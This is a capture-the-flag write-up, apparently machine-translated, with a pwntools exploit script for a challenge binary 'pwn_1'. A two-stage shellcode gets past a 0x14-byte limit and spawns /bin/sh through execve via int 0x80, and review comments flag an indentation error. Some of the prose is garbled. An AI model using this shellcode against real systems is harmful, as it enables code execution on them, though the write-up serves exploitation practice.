The only difficulty in this challenge is that the shellcode is limited to a size of 0x14.
Actually, this problem does not intend to send blog but there is little sister to see ~ ~ ~ to send up to write a
Let's take a look at what the program does.
{One silly thing: this program is so peculiar that F5 could not decompile it at all, which put me in a bad mood
Then I patched the `call eax` that was messing things up to `nop`
and F5 went through in one go
}
23333 So the question really just comes down to the shellcode: change the parameter to a large number, then push/ret and go.
emmm I think the comments explain it, so just look at the exp directly.
import sys
from pwn import *
#context.log_level='debug'
#context.arch='amd64'
# NOTE(review): the `if` below has no indented body — as pasted, `io=process(...)`
# sits at column 0, which is a SyntaxError. Presumably the indentation was lost
# when the writeup was posted (and an `else:` branch for a remote target may have
# been dropped) — TODO confirm against the original script.
if len(sys.argv)==1 :
io=process('./pwn_1')
elf=ELF('./pwn_1')
#libc=ELF('')
# Stage 1: hand-encoded machine code. The author's note on the next line gives
# the instruction; the bytes are kept raw rather than going through asm().
pay='\xC7\x44\x24\x08\x44\x00\x00\x00'
#mov dword ptr [esp + 8], 0x44
# push/ret to a fixed address inside ./pwn_1 — this only works when the binary
# is loaded at its link-time address (no PIE); the value is specific to this
# challenge binary.
pay+=asm("push 0x0804848E")
pay+=asm("ret")
print len(pay)  # Python 2 print statement (the whole script is Python 2)
# Debugging aid: attaches gdb with a breakpoint at a fixed address. Remove or
# comment out for an unattended run, since attach blocks until gdb is ready.
gdb.attach(io,'b *0x080484CB')
io.sendline(pay)
io.recv()
# Stage 2: register setup for an int 0x80 system call, assembled one
# instruction at a time with asm().
pay=asm("push 0xb")      # eax = 0xb via push/pop
pay+=asm("pop eax")
pay+=asm("cdq")          # edx = sign-extension of eax, i.e. 0
pay+=asm("push edx")     # pushes a zero dword onto the stack
pay+=asm("sub ebp,8")
pay+=asm("mov ebx,ebp")  # ebx = ebp - 8; presumably the address where the
                         # '/bin/sh' string appended below ends up — depends on
                         # the frame layout at the stage-1 target, TODO confirm
pay+=asm("xor ecx,ecx")  # ecx = 0
pay+=asm("int 0x80")
# Pad to offset 0x21, then place the NUL-terminated string; the offset is
# specific to this binary's stack layout.
pay=pay.ljust(0x21,'a')
pay+='/bin/sh\x00'
print len(pay)
io.sendline(pay)
#pause()
io.interactive()